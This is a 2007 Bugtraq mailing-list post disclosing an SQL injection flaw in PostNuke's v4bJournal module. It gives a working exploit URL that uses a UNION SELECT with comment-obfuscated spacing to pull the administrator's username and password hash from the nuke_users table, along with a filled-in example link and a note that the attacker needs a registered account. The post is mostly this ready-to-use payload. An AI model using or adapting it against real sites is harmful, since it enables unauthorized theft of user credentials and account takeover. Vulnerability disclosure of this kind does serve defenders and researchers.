Post Nuke v4bJournal Module Sql Inject

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Post Nuke v4bJournal Module Sql Inject
From: abbasi@xxxxxxxxxxx
Date: 2 May 2007 17:59:34 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----------------------------------------

PostNuke Journal

----------------------------------------

                                   

                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
       
   Greetz For All Y! UnderGround Group Members ( www.2600.ir )

    Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

         Contact:     abbasi@xxxxxxxxxxx





                                   {SQL BUG}







in 

    index.php?module=v4bJournal&func=journal_comment&id=(SQL)









------------------------------------------



         EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS@xxxxxxxxx 

 





   
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*



EX:- 

http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*





U must regrister first ( You Most Have An Account On Vulnerable Site )

-------------------------------------------

Prev by Date: Cisco Security Advisory: LDAP and VPN Vulnerabilities in PIX and ASA Appliances
Next by Date: iDefense Security Advisory 05.02.07: LiveData Protocol Server Heap Overflow Vulnerability
Previous by thread: Cisco Security Advisory: LDAP and VPN Vulnerabilities in PIX and ASA Appliances
Next by thread: iDefense Security Advisory 05.02.07: LiveData Protocol Server Heap Overflow Vulnerability
Index(es):
- Date
- Thread